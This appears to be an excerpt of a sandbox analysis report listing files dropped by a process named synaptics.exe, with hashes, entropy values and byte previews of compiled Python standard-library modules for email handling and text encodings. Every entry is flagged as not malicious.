                                                                                                                                                                                                                Preview:o........{-d^........................@...sl...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.d...Z.d.d.d...Z.d.e.f.d.d...Z.d.d...Z.e.Z.e.Z.d.S.).a....Base64 content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode arbitrary 8-bit data using the three 8-bit bytes in four 7-bit.characters encoding known as Base64...It is used in the MIME standards for email to attach images, audio, and text.using some 8-bit character sets to messages...This module provides an interface to encode and decode both headers and bodies.with Base64 encoding...RFC 2045 defines a method for including character set information in an.`encoded-word' in a header. This method is commonly used for 8-bit real names.in To:, From:, Cc:, etc. fields, as well as Subject: lines...This module does not do the line wrapping or end-of-line character conversion.necessary for proper internationalized headers; it only does dumb encoding and.dec
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):11585
                                                                                                                                                                                                                Entropy (8bit):5.322334643880502
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:y71q2Qm6z+wYWW28DGmahcQx6Pk/pO5oU/5Ob9WJ//abe8+xGb/+w:a1ZRS+ZT2yGRz/p2/5ObDbv+w
                                                                                                                                                                                                                MD5:9076B6E12CA043E5043D4F22914DA4B1
                                                                                                                                                                                                                SHA1:2A1AF0B35BC110E80CA6D43A7DCD06CC1764A453
                                                                                                                                                                                                                SHA-256:69751673DB77EF96B14AC0FEAA8D2FFDEFE19D024F6F3A6FB88D59BFCB30F6BE
                                                                                                                                                                                                                SHA-512:51E94893C6F8F81AC9F890FF3CBF8043305AD8AF08C26DBF4DCD082AF8B2496B31B2B8920A53CE04AD151BE66F708D0FE79E312CE0D5B6B3A64995FE6D047450
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d|D.......................@...s....g.d...Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.e.e.d.f...d.d...d.e.e.d.f...d.e.e.d.f...d.e.d.d.f...d.e.d.d.f...e.d.d.f.e.e.d.f.e.e.d.f.d ....Z.i.d!d...d"d...d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d.d.d.d2d.d3d.d4....Z.d5d6d.d7..Z.d.d8d9..Z.d:d;..Z.d<d=..Z.d>d?..Z.G.d@dA..dA..Z.d.S.)B)...Charset..add_alias..add_charset..add_codec.....)...partialN)...errors)...encode_7or8bit......................us-asciiz.unknown-8bit..z.iso-8859-1z.iso-8859-2z.iso-8859-3z.iso-8859-4z.iso-8859-9z.iso-8859-10z.iso-8859-13z.iso-8859-14z.iso-8859-15z.iso-8859-16z.windows-1252Z.viscii).NNN..big5..gb2312z.euc-jp..iso-2022-jp..shift_jis..utf-8).r....z.koi8-rr......latin_1z.latin-1Z.latin_2z.latin-2Z.latin_3z.latin-3Z.latin_4z.latin-4Z.latin_
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1637
                                                                                                                                                                                                                Entropy (8bit):5.071297880276593
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:Zy7gaTT5rqICrNt7xhHfWuNXwQFd9EGZvPJ5rJxEwkJpDkvyz3:Z/9ht7bWEgQFYSvrEDkvyz3
                                                                                                                                                                                                                MD5:9FFC5C3D97248329949D250B644CFD01
                                                                                                                                                                                                                SHA1:3DCD641778C5A93CCFA58872255A3FF335EDB236
                                                                                                                                                                                                                SHA-256:BDD15448C25582497E9BAEFA7B111D036C823F66CBF24B77BE9FA4C781BFAAF1
                                                                                                                                                                                                                SHA-512:46BC575E35E8D6F3D823022D3B6CD64001B5087A63F2E99E3434CCA7937DA80C56C25B471BBB33B8B3D29679AE6CA2D51814298758D830841AC78C64D00E3F57
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d?........................@...sP...d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z Encodings and related functions.)...encode_7or8bit..encode_base64..encode_noop..encode_quopri.....)...encodebytes)...encodestringc....................C...s....t.|.d.d...}.|...d.d...S.).NT).Z.quotetabs..... s....=20)..._encodestring..replace)...s..enc..r...../C:\Users\user\Desktop\tmp\lib\email\encoders.py.._qencode....s........r....c....................C...s0...|.j.d.d...}.t.t.|...d...}.|...|.....d.|.d.<.d.S.).zlEncode the message's payload in Base64... Also, add an appropriate Content-Transfer-Encoding header.. T....decode..ascii..base64..Content-Transfer-EncodingN)...get_payload..str.._bencode..set_payload....msg..origZ.encdatar....r....r....r........s............r....c....................C...s*...|.j.d.d...}.t.|...}.|...|.....d.|.d.<.d.S.).zvEncode the message's payload in quoted-printable... Also, add an appropriate Content-Transfer-Encoding hea
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5712
                                                                                                                                                                                                                Entropy (8bit):4.730832987212451
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:8YI+E7YT1Z4Q6ELjeDJ87gw1aXJE6iqFoARF3IloR/Qg1pDX4Qmbsru3m:8YTEOCQJ2DJ87gtXJniqn3IeWQCQmbsz
                                                                                                                                                                                                                MD5:626EAF5C602C5BD8D728366752959462
                                                                                                                                                                                                                SHA1:DDAB47C7F1E97A2A22CA03E517834AD0910B6841
                                                                                                                                                                                                                SHA-256:0B814D6D4513534704EC892C6165AADE904C77E7E91370EC669FB210FA818C11
                                                                                                                                                                                                                SHA-512:D4317B52B6914B829A473264F7ED1592F46C8A75BE38C7EA7594DD4AFCC876A29F628D2A61289AE1E897DC11906230F5A742EA187C72362FDEE933A9303C1522
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.e.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.G.d.d ..d e...Z.G.d!d"..d"e...Z.G.d#d$..d$e...Z.G.d%d&..d&e...Z.G.d'd(..d(e...Z.G.d)d*..d*e...Z.G.d+d,..d,e...Z.G.d-d...d.e...Z.G.d/d0..d0e...Z.G.d1d2..d2e...Z.G.d3d4..d4e...Z.d5S.)6z email package exception classes.c....................@........e.Z.d.Z.d.Z.d.S.)...MessageErrorz+Base class for errors in the email package.N....__name__..__module__..__qualname__..__doc__..r....r.....-C:\Users\user\Desktop\tmp\lib\email\errors.pyr.................r....c....................@...r....)...MessageParseErrorz&Base class for message parsing errors.Nr....r....r....r....r....r........r....r....c....................@...r....)...HeaderParseErrorz.Error while parsing headers.Nr....r....r....r....r....r........
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10588
                                                                                                                                                                                                                Entropy (8bit):5.444436812541746
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:IQt3lEm80KYgjRm95weZd6S3DFKTbefqH0P302hjD8gYo5:jtVEx0KYr5weZJ3DFSbei+029D8Zo5
                                                                                                                                                                                                                MD5:2EB301CDD07BA8EEE956C882C5ED85B5
                                                                                                                                                                                                                SHA1:D5C47A9D353D1D895B2A5EDB0DDAC0CB27339320
                                                                                                                                                                                                                SHA-256:EA89EEBFD5E6FB3CB3A71ACEF6A0AD70FDA2082543B38220C08A758EDB3E03FB
                                                                                                                                                                                                                SHA-512:D7ED29E1C3F4485CD81030A9474A75CD5B6B6E58373B199D24493D0F4F27864CCB99A1C85E7AB7D841C1FE77E6A5B80B7717F9CB98064553A11509B9001050B2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.[.......................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...d...Z.e...d...Z.e...d...Z.e...d...Z.e...d...Z.d.Z.d.Z.e...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).a....FeedParser - An email feed parser...The feed parser implements an interface for incrementally parsing an email.message, line by line. This has advantages for certain applications, such as.those reading email messages off a socket...FeedParser.feed() is the primary interface for pushing new data into the.parser. It returns when there's nothing more it can do with the available.data. When you have no more data to push into the parser, call .close()..This completes the parsing and returns the root message object...The other advantage of this parser is that it will never raise a parsing.exception. Instead, when it finds something unexpected, it adds a 'defect' to.the current message. Defects are just instances that live on the message.object's .defects a
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):16472
                                                                                                                                                                                                                Entropy (8bit):5.349356081838418
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:ZEojVdryA8pfSNW44RPb/bliTC72UjV9LFqSevFmHj0HP8HMJ25cPh:ZEQ/85S844NbMGvcPh
                                                                                                                                                                                                                MD5:A04EEF90A83943FE3B29E42793D1886E
                                                                                                                                                                                                                SHA1:CB5235714509A94152354D1F321836D11FD25B44
                                                                                                                                                                                                                SHA-256:E288EB9C06EF529ECAB22EE4E5C9D0A932FE420EC672B2422E97E8C2AEA5C9FB
                                                                                                                                                                                                                SHA-512:FECBCB3FAB9DDD733628B2B6C067E54BD09A46FD431F22B38A29A03399DFC2FE30DA2E4B5EE9038E66BCA60D92064FAA887F7E7A0219F703AB9F42DA086DF4F3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dh`.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d...Z.e.d...Z.e...d.e.j.e.j.B...Z.e...d...Z.e...d...Z.e.j.j.Z.d.d...Z.....d.d.d...Z.G.d.d...d...Z.G.d.d...d...Z G.d.d...d.e!..Z"d.S.).z+Header encoding and decoding functionality.)...Header..decode_header..make_header.....N)...HeaderParseError)...charset..... ..... z. ...N...z. ...us-asciiz.utf-8ai.... =\? # literal =?. (?P<charset>[^?]*?) # non-greedy up to the next ? is the charset. \? # literal ?. (?P<encoding>[qQbB]) # either a "q" or a "b", case insensitive. \? # literal ?. (?P<encoded>.*?) # non-greedy up to the next ?= is the encoded string. \?= # literal ?=. z.[\041-\176]+:$z.\n[^ \t]+:c....................C...s....t.|.d...r.d.d...|.j.D...S.t...|...s.|.d.f.g.S.g.}.|.....D.]A}.t...|...}.d.}.|.r^|...d...}.|.r5|.....}.d.}.|.r?|...|.d.d.f.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1978
                                                                                                                                                                                                                Entropy (8bit):5.3228602222584245
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:yhA49ILWjxKOzvfOoUFQLfMbhoJ9t1eYG1lGLG+hEl9:yrIWdZ5UFsMbhOQGTEl9
                                                                                                                                                                                                                MD5:9433AC9188904FB62875D949E337522D
                                                                                                                                                                                                                SHA1:F38B02E18C6FA325F4A9F9210DF86BE917CA0362
                                                                                                                                                                                                                SHA-256:18747B05B88953A41644016409714C740239F1B83E08B881BCFE286E8A23BED3
                                                                                                                                                                                                                SHA-512:A509235748BCCD1CD4CB081EF482B59C093830D7A0272007E23AD9A5CC583FC395DEE3F108BF08CFF27E1F95CA73735F1D5AF3D21DCE4608562B8002FACBC806
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sJ...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).z1Various types of useful iterators and generators.)...body_line_iterator..typed_subpart_iterator..walk.....N)...StringIOc....................c...s4.....|.V...|.....r.|.....D.].}.|.....E.d.H...q.d.S.d.S.).z.Walk over the message tree, yielding each subpart... The walk is performed in depth-first order. This method is a. generator.. N)...is_multipart..get_payloadr....)...self..subpart..r.....0C:\Users\user\Desktop\tmp\lib\email\iterators.pyr........s..................r....Fc....................c...s8.....|.....D.].}.|.j.|.d...}.t.|.t...r.t.|...E.d.H...q.d.S.).z.Iterate over the parts, returning string payloads line-by-line... Optional decode (default False) is passed through to .get_payload().. )...decodeN).r....r......isinstance..strr....)...msgr....r......payloadr....r....r....r...."...s..................r......textc....................c...s:.....|.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):37814
                                                                                                                                                                                                                Entropy (8bit):5.295163318637581
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:73vKre029TBAXUyI2UBNqLYn1cT93o29AevROi/GTs:bvN029TSUr26N+OaT9YmAWSs
                                                                                                                                                                                                                MD5:F388EC69F06375AE5B253FC8205B9839
                                                                                                                                                                                                                SHA1:71A2C1C8F99A04D5E28D80870154F751AC99EDD6
                                                                                                                                                                                                                SHA-256:658E9270DB8C90803980A23A699EF8A13574B00EF1549D4681E9D10C43C95557
                                                                                                                                                                                                                SHA-512:F9EC2B3C2399BFC07E3C676FCE4CBAB5A4073CA184D21EB900A496F121431DCD2049DB0AFE03B212B99F995D16FBB45C31DA7AD58050D566932C471A346AE654
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-di........................@...s....d.Z.d.d.g.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j.Z.d.Z.e...d...Z.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.S.).z8Basic message object for the email package object model...Message..EmailMessage.....N)...BytesIO..StringIO)...utils)...errors)...Policy..compat32....charset)...decode_bz.; z.[ \(\)<>@,;:\\"/\[\]\?=]c....................C...s4...t.|.....d...\.}.}.}.|.s.|.....d.f.S.|.....|.....f.S.).N..;)...str..partition..strip)...param..a..sep..b..r......C:\Users\user\Desktop\tmp\lib\email\message.py.._splitparam....s............r....Tc....................C...s....|.d.u.r^t.|...d.k.r^t.|.t...r&|.d.7.}.t...|.d...|.d...|.d.....}.d.|.|.f...S.z.|...d.....W.n...t.yG......|.d.7.}.t...|.d.d...}.d.|.|.f.....Y.S.w.|.sOt...|...rXd.|.t...|...f...S.d.|.|.f...S.|.S.).a~...Convenience function to format and return a key=value pair... This will quot
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5683
                                                                                                                                                                                                                Entropy (8bit):4.915891677882916
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:x/3XAtc7ue6RPlVEnTSi7sebc9++etT2FZXUVt3NzMb:Vgtc7+RPETSi7sebc9M2LXUVt3NzMb
                                                                                                                                                                                                                MD5:58A1A358D09CBEF7F5A6DE6D6F9FE94F
                                                                                                                                                                                                                SHA1:95CC523EFF7A22F5CC1D974055408D5029DFD84F
                                                                                                                                                                                                                SHA-256:98C7F8B46D92F1D6E65D7758BEA72F89D356D3B8E07BE9A4042C2486634FA193
                                                                                                                                                                                                                SHA-512:9D8E184C7DD7A4EE660BAC94BB3FF06306025EA16C1966CBF9283F3C4F532675F7ACEA914FD6A2D7521284242138F4D9D23AB5CAAD274FF3532213F99CF53BA7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d4........................@...sx...d.Z.g.d...Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...G.d.d...d...Z.G.d.d...d.e...Z.G.d.d...d...Z.G.d.d...d.e...Z.d.S.).z-A parser of RFC 2822 and MIME email messages.)...Parser..HeaderParser..BytesParser..BytesHeaderParser..FeedParser..BytesFeedParser.....)...StringIO..TextIOWrapper).r....r....)...compat32c....................@...s0...e.Z.d.Z.d.e.d...d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....N....policyc....................C...s....|.|._.|.|._.d.S.).a....Parser of RFC 2822 and MIME email messages... Creates an in-memory object tree representing the email message, which. can then be manipulated and turned over to a Generator to return the. textual representation of the message... The string must be formatted as a block of RFC 2822 headers and header. continuation lines, optionally preceded by a `Unix-from' header. The. header block is terminated either by the end of the string or by a. blank
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):7633
                                                                                                                                                                                                                Entropy (8bit):5.503310949843634
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:SLJLyjCY2rlgeRk/SEq4iIf3HOxK4RVZtpes7tOcQekFUyq2n1/ugYu9eYBAd7z4:eJYUGQ2SEn27RlpsyyFhugYQeYBk8B9
                                                                                                                                                                                                                MD5:39505C42AECE7E863ACF61B3A9B43CA2
                                                                                                                                                                                                                SHA1:30B51B58A2370EFB41DE7336C7C0662FBE17078E
                                                                                                                                                                                                                SHA-256:5B79E4519A0712D35EC2CB839060A9CA2794AC671DB027A2ACF3476294C1DA3D
                                                                                                                                                                                                                SHA-512:C6C757F564B1C54F0C176A6CFE8A160B4092D4B691210ABF716EDDB199B947E86FA8484987334326804E154457A90CD9B5EDDA0B1A39298B25149DB2F0235495
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.'.......................@...sF...d.Z.g.d...Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z.d.d...e.d...D...Z.e.d.d.....Z.e.d.d.....Z.d.e...d.....e...d.....D.].Z.e.e...e.e.<.q;d.e.e.d...<.d.D.].Z.e.e...e.e.<.qLd.d...Z.d.d...Z.d.d...Z.d.d...Z.d+d.d...Z.d.d...Z.d.d...Z.d,d.d ..Z.e.d.d.....Z.d!D.].Z.e.e...e.e.<.q.d"e.f.d#d$..Z.e.f.d%d&..Z.e.Z.e.Z.d'd(..Z.d)d*..Z d.S.)-aF...Quoted-printable content transfer encoding per RFCs 2045-2047...This module handles the content transfer encoding method defined in RFC 2045.to encode US ASCII-like 8-bit data called `quoted-printable'. It is used to.safely encode text that is in a character set similar to the 7-bit US ASCII.character set, but that includes some 8-bit characters that are normally not.allowed in email bodies or headers...Quoted-printable is very space-inefficient for encoding binary files; use the.email.base64mime module for that instead...This module provides an interface to encode and decode both headers and bodies.with quoted-p
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):9696
                                                                                                                                                                                                                Entropy (8bit):5.523212904026857
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:+bd4hopYU1b0vS5Tc8PNMw1TBrUEPUcXDu4cGGZscLPtCSStw3TG/3W4b/o:upyv+FSwNBrUmbXDu4QRPzGyGn/o
                                                                                                                                                                                                                MD5:CA5C50CCDE703FC0CAEB244112518581
                                                                                                                                                                                                                SHA1:922C39CA61A1B75A7DE04E8551BC0A1698D02DFD
                                                                                                                                                                                                                SHA-256:8FC4CEBE24F54EA97BEE6CFDC44D4D35B9E6E40E12731807623990C754496BEB
                                                                                                                                                                                                                SHA-512:6EB1DD3543D6E11A59B05C2D5AD09AFAED28C415094134DB9B3F7186DA3668CFE3932FD8F32DD1E54AC1313BE4F4FF8AFF87E1673CEB225D5707AE1A6C7011D7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.5.......................@...sT...d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.e...d...Z.e...d...Z.d.d...Z.d.d...Z.d5d.d...Z.d.d...Z.d.d...Z d6d.d...Z!d7d.d...Z"d8d.d ..Z#d!d"..Z$d#d$..Z%d%d&..Z&d'd(..Z'd8d)d*..Z(e...d+e.j)..Z*d,d-..Z+.../d9d0d1..Z,d:d3d4..Z-d.S.);z.Miscellaneous utilities.)...collapse_rfc2231_value..decode_params..decode_rfc2231..encode_rfc2231..formataddr..formatdate..format_datetime..getaddresses..make_msgid..mktime_tz..parseaddr..parsedate..parsedate_tz..parsedate_to_datetime..unquote.....N)...quote)...AddressList).r....).r....r......_parsedate_tz)...Charsetz., ..z.....'z.[][\\()<>@,:;".]z.[\\"]c....................C...s$...z.|.......W.d.S...t.y.......Y.d.S.w.).z8Return True if s contains surrogate-escaped binary data.FT)...encode..UnicodeEncodeError)...s..r.....,C:\Users\user\Desktop\tmp\lib\email\utils.py.._has_surrogates3...s................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3885
                                                                                                                                                                                                                Entropy (8bit):5.524262788207071
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:MXLHIYGspF3e06Q0YhQLUjHz/6k1XYLKM/n5K7wlNUNYfq3JZ1Y:MXEYLpFkY2U7XYLf5c6+X1Y
                                                                                                                                                                                                                MD5:FCDA77DFE512009B8D8AD9CDE41F8A67
                                                                                                                                                                                                                SHA1:424076830266BB8D697E548A785E42B918A40FB9
                                                                                                                                                                                                                SHA-256:5589E7A3CAAA59D40C6A07041D10F54F2EC2558390858BD7CB67DD2C18725291
                                                                                                                                                                                                                SHA-512:7BB82A8654BB07BE7472159C0B771ED849D8F661E735EA0233A75474F2AD98201A142BEEED50481A24DEBA72E914014537B2146A2EC8763A55D1217183B7C447
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...i.Z.d.Z.d.g.Z.e.j.Z.G.d.d...d.e.e...Z.d.d...Z.d.d...Z.e...e.....e.j.d.k.r@d.d...Z.e...e.....d.S.d.S.).a2... Standard "encodings" Package.. Standard Python encoding modules are stored in this package. directory... Codec modules must have names corresponding to normalized encoding. names as defined in the normalize_encoding() function below, e.g.. 'utf-8' must be implemented by the module 'utf_8.py'... Each codec module must export the following interface:.. * getregentry() -> codecs.CodecInfo object. The getregentry() API must return a CodecInfo object with encoder, decoder,. incrementalencoder, incrementaldecoder, streamwriter and streamreader. attributes which adhere to the Python Codec Interface Standard... In addition, a module may optionally also define the following. APIs which are then used by the package's codec search function:.. * getaliases() -> sequence of enc
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10931
                                                                                                                                                                                                                Entropy (8bit):5.8411032649898615
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:UX2eNkBweGfGkueK4+I2Zyu6UtXqxUZH1iPzxOkq4bpehh3qkyR0N:UXG0bueBI6dzx9IX6Ri
                                                                                                                                                                                                                MD5:7C587610D263481416BFDA054A2FD106
                                                                                                                                                                                                                SHA1:E376C927994F63B2C23953E0A50DDB68D7722499
                                                                                                                                                                                                                SHA-256:0891947219A1E2429EE45BB47271306961A27964094570D283D917D18C157325
                                                                                                                                                                                                                SHA-512:FA5A68968AA894AA5C5C313B8ABC031A148E09BD0805ED3A015E4D2756C6703C992935FD7A36362B93869943699BC67378321FBD576B597999F107D2F484F4A4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dd?.......................@...s....d.Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d...d!d...d"d#..d$d#..d%d#..d&d'..d(d'..d)d'..d*d'....i.d+d,..d-d,..d.d/..d0d/..d1d2..d3d2..d4d5..d6d5..d7d8..d9d8..d:d;..d<d;..d=d>..d?d>..d@dA..dBdA..dCdD....i.dEdD..dFdG..dHdG..dIdJ..dKdJ..dLdJ..dMdN..dOdN..dPdN..dQdN..dRdS..dTdS..dUdS..dVdW..dXdW..dYdW..dZdW....i.d[dW..d\d]..d^d]..d_d]..d`da..dbda..dcda..ddde..dfde..dgde..dhdi..djdi..dkdi..dldm..dndm..dodm..dpdq....i.drdq..dsdq..dtdu..dvdu..dwdu..dxdy..dzdy..d{dy..d|dy..d}d~..d.d~..d.d~..d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d.....i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d..d.d..d.d..d.d..d.d..
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):2387
                                                                                                                                                                                                                Entropy (8bit):5.427051068107574
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:NHYqr1EMGxtCOJxDvTk3J9rBDfLTTLTDfLTTp6HbDHT:NHY0EMWtZjr+Jldf33Pf396nz
                                                                                                                                                                                                                MD5:1970C795A0F8A0502A6346A4B47D4DE0
                                                                                                                                                                                                                SHA1:51854F12D13B3EDFED58C788C0EF67C3834F53BA
                                                                                                                                                                                                                SHA-256:39DE01364D797CA84667D99AD843703F6918277BABC2624247A7632013454830
                                                                                                                                                                                                                SHA-512:41349E16A44D930A471533A7A9CBA8B6CC946908EFF0F277CFEBAF7D9DF10FBACF905570E3B16EBF8AC1AF31BD41DA8065BE418B789CFC29B463751228F7CD07
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.5.......................@...s....d.Z.d.d.l.Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.e.j...Z.G.d.d...d.e.e.j...Z.d.d...Z.d.Z.e...e...Z.d.S.).zv Python Character Mapping Codec cp1252 generated from 'MAPPINGS/VENDORS/MICSFT/WINDOWS/CP1252.TXT' with gencodec.py........Nc....................@...s ...e.Z.d.Z.d.d.d...Z.d.d.d...Z.d.S.)...Codec..strictc....................C........t...|.|.t...S...N)...codecs..charmap_encode..encoding_table....self..input..errors..r.....1C:\Users\user\Desktop\tmp\lib\encodings\cp1252.py..encode...........z.Codec.encodec....................C...r....r....).r......charmap_decode..decoding_tabler....r....r....r......decode....r....z.Codec.decodeN).r....)...__name__..__module__..__qualname__r....r....r....r....r....r....r........s..........r....c....................@........e.Z.d.Z.d.d.d...Z.d.S.)...IncrementalEncoderFc....................C........t...|.|.j.t...d...S...Nr....).r....r....r....r......r....r......finalr....r....r.
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):5609
                                                                                                                                                                                                                Entropy (8bit):5.226206035521818
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:eD5ooZ0Mq9d9y50Om16wQNWLT1arA5fCAFK5n4NcJwp7ogXdB:u2oZ0n9d92Dm1rQNWL8s5aZocJwpJNB
                                                                                                                                                                                                                MD5:A3A2132FFD914BA67503030546E59E3D
                                                                                                                                                                                                                SHA1:72154ADD1786256FC81B9863CFFC5E9FCC594F68
                                                                                                                                                                                                                SHA-256:5E4310074D2B443D6B6DBDCF66C0A68462ADDB6113488B998F657DAC00CFD72F
                                                                                                                                                                                                                SHA-512:A636592CE6605C4CE52C798E950AF928D2C0DA6CDC38C8F0BDCDB9ECE282E1CF303125F0FE7030AF04FD7A938B09DA0BE0B7FBB5B31C2A206A2257CC9E073BC4
